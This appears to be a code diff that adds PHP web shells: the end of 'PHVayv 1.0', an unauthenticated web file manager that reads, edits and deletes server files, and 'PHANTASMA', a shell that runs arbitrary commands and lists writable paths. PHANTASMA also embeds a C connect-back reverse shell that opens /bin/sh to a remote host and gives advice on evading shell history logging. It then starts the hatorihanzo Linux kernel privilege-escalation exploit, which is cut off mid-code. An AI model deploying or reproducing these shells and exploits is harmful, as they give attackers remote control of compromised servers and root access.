+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan </span></font>
+        <font face="Verdana" style="font-size: 8pt">Dizin</font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            &nbsp;</td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="495">
+  <tr>
+    <td width="100%" bgcolor="#000000" height="19">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F" align="center" height="455">
+    <form method="POST" action="<?echo "$fistik.php?yenidosya=1&dizin=$dizin"?>" 
+      <p align="center"><br>
+      <font
+                color="#FFFFFF" size="1" face="Arial">
+<input
+                type="text" size="50" maxlength="32"
+                name="duzenx2" value="Dosya Adý"
+                class="search"
+                onblur="if (this.value == '') this.value = 'Kullanýcý'"
+                onfocus="if (this.value == 'Kullanýcý') this.value=''"
+                style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"></font></p>
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliþtirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalýþýlan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adý</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Ýþlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>

php/PHANTASMA.php

@@ -0,0 +1,634 @@
+<CENTER>
+<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">PHANTASMA- NeW CmD ;) </DIV>
+<BR>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">Informação do sistema</DIV>
+<?php
+
+// 
+  closelog( );
+
+  $dono = get_current_user( );
+  $ver = phpversion( );
+  $login = posix_getuid( );
+  $euid = posix_geteuid( );
+  $gid = posix_getgid( );
+  if ($chdir == "") $chdir = getcwd( );
+
+?>
+<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
+<?php
+
+  $uname = posix_uname( );
+  while (list($info, $value) = each ($uname)) {
+
+?>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>: <?= $value ?></DIV></TD>
+  </TR>
+<?php
+  }
+?>
+ 
+  <TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Script Current User: <?= $dono ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">PHP Version: <?= $ver ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Current Path: <?= $chdir ?></DIV></TD>
+  </TR>
+  <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Server IP: <?php $aaa =  gethostbyname($SERVER_NAME);  echo $aaa;?></DIV></TD>
+  </TR>
+   <TR>
+    <TD><DIV STYLE="font-family: verdana; font-size: 15px;">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?></DIV></TD>
+  </TR>
+</TABLE>
+<BR>
+<?php
+
+  if ($cmd != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Command Mode Run</DIV>";
+
+?>
+
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Command Stdout</DIV>
+<?php
+
+if ($fe == 1){
+$fe = "exec";
+}
+if ($fe == ""){
+$fe = "passthru";
+}
+if ($fe == "2"){
+$fe = "system";
+}
+
+    if (isset($chdir)) @chdir($chdir);
+
+    ob_start( );
+      $fe("$cmd  2>&1");
+      $output = ob_get_contents();
+    ob_end_clean( );
+
+?>
+<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
+<?php
+
+    if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
+?>
+</TEXTAREA>
+<BR>
+<?php
+
+  }
+ 
+  if ($safemode != "") {
+    echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Safemode Mode Run</DIV>";
+
+?>
+<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">Safe Mode Directory Listing</DIV>
+<?php
+
+    if ($dir = @opendir($chdir)) {
+      echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
+      echo "<TR>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
+      while (($file = readdir($dir)) !== false) {
+        if (@is_file($file)) {
+          $file1 = fileowner($file);
+          $file2 = fileperms($file);
+    	  echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>"; 
+	  // echo "<font color=green>$file1 - $file2 - $file </font><br>";
+          flush( );
+        }
+      }
+
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Only Folders</b> <br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+	    echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>"; 
+            // echo "<font color=blue>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo"<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Folders</b><br><br>";
+      if ($dir = @opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_dir($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+            echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TD>";
+      echo "<TD valign=top>";
+      echo "<b><font size=2 face=arial>List Writable Files</b> <br><br>";
+ 
+      if ($dir = opendir($chdir)) {
+        while (($file = readdir($dir)) !== false) {
+          if (@is_writable($file) && @is_file($file)) {
+            $file1 = fileowner($file);
+            $file2 = fileperms($file);
+    	    echo "<font color=red>$file1 - $file2 - $file </font><br>";
+          }
+        }
+      }
+      echo "</TD>";
+      echo "</TR>";
+      echo "</TABLE>";
+    }
+  }
+
+?>
+<?php
+
+  if ($shell == "write") {
+    $shell = "#include <stdio.h>\n" .
+             "#include <sys/socket.h>\n" .
+             "#include <netinet/in.h>\n" .
+             "#include <arpa/inet.h>\n" .
+             "#include <netdb.h>\n" .
+             "int main(int argc, char **argv) {\n" .
+             "  char *host;\n" .
+             "  int port = 80;\n" .
+             "  int f;\n" .
+             "  int l;\n" .
+             "  int sock;\n" .
+             "  struct in_addr ia;\n" .
+             "  struct sockaddr_in sin, from;\n" .
+             "  struct hostent *he;\n" .
+             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
+             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
+             "                \"For More Reliable Shell.\\n\"\n" .
+             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
+             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
+             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
+             "  if (argc < 2 || argc > 3) {\n" .
+             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Dumping Arguments\\n\");\n" .
+             "  l = strlen(argv[1]);\n" .
+             "  if (l <= 0) {\n" .
+             "    printf(\"[-] Invalid Host Name\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (!(host = (char *) malloc(l))) {\n" .
+             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  strncpy(host, argv[1], l);\n" .
+             "  if (argc == 3) {\n" .
+             "    port = atoi(argv[2]);\n" .
+             "    if (port <= 0 || port > 65535) {\n" .
+             "      printf(\"[-] Invalid Port Number\\n\");\n" .
+             "      return 1;\n" .
+             "    }\n" .
+             "  }\n" .
+             "  printf(\"[*] Resolving Host Name\\n\");\n" .
+             "  he = gethostbyname(host);\n" .
+             "  if (he) {\n" .
+             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
+             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
+             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  sin.sin_family = PF_INET;\n" .
+             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
+             "  sin.sin_port = htons(port);\n" .
+             "  printf(\"[*] Connecting...\\n\");\n" .
+             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
+             "    printf(\"[-] Socket Error\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
+             "    printf(\"[-] Unable to Connect\\n\");\n" .
+             "    return 1;\n" .
+             "  }\n" .
+             "  printf(\"[*] Spawning Shell\\n\");\n" .
+             "  f = fork( );\n" .
+             "  if (f < 0) {\n" .
+             "    printf(\"[-] Unable to Fork\\n\");\n" .
+             "    return 1;\n" .
+             "  } else if (!f) {\n" .
+             "    write(sock, msg, sizeof(msg));\n" .
+             "    dup2(sock, 0);\n" .
+             "    dup2(sock, 1);\n" .
+             "    dup2(sock, 2);\n" .
+             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
+             "    close(sock);\n" .
+             "    return 0;\n" .
+             "  }\n" .
+             "  printf(\"[*] Detached\\n\\n\");\n" .
+             "  return 0;\n" .
+             "}\n";
+
+    $fp = fopen("/tmp/dc-connectback.c", "w");
+    $ok = fwrite($fp, $shell);
+
+    if (!empty($ok)) {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
+    } else {
+      echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
+    }
+  }
+
+  if ($kernel == "write") {
+    $kernel = "/*\n" .
+              " * hatorihanzo.c\n" .
+              " * Linux kernel do_brk vma overflow exploit.\n" .
+              " *\n" .
+              " * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
+              " *\n" .
+              " * Further research and exploit development by\n" .
+              " * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
+              " *\n" .
+              " * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
+              " *\n" .
+              " * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
+              " * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
+              "*/\n" .
+              "#define _GNU_SOURCE\n" .
+              "#include <stdio.h>\n" .
+              "#include <stdlib.h>\n" .
+              "#include <errno.h>\n" .
+              "#include <string.h>\n" .
+              "#include <unistd.h>\n" .
+              "#include <fcntl.h>\n" .
+              "#include <signal.h>\n" .
+              "#include <paths.h>\n" .
+              "#include <grp.h>\n" .
+              "#include <setjmp.h>\n" .
+              "#include <stdint.h>\n" .
+              "#include <sys/mman.h>\n" .
+              "#include <sys/ipc.h>\n" .
+              "#include <sys/shm.h>\n" .
+              "#include <sys/ucontext.h>\n" .
+              "#include <sys/wait.h>\n" .
+              "#include <asm/ldt.h>\n" .
+              "#include <asm/page.h>\n" .
+              "#include <asm/segment.h>\n" .
+              "#include <linux/unistd.h>\n" .
+              "#include <linux/linkage.h>\n" .
+              "#define kB   * 1024\n" .
+              "#define MB   * 1024 kB\n" .
+              "#define GB   * 1024 MB\n" .
+              "#define MAGIC             0xdefaced /* I should've patented this number -cliph */\n" .
+              "#define ENTRY_MAGIC 0\n" .
+              "#define ENTRY_GATE 2\n" .
+              "#define ENTRY_CS    4\n" .
+              "#define ENTRY_DS    6\n" .
+              "#define CS          ((ENTRY_CS << 2) | 4)\n" .
+              "#define DS          ((ENTRY_DS << 2) | 4)\n" .
+              "#define GATE        ((ENTRY_GATE << 2) | 4 | 3)\n" .
+              "#define LDT_PAGES   ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
+              "#define TOP_ADDR    0xFFFFE000U\n" .
+              "/* configuration */\n" .
+              "unsigned     task_size;\n" .
+              "unsigned     page;\n" .
+              "uid_t        uid;\n" .
+              "unsigned     address;\n" .
+              "int dontexit = 0;\n" .
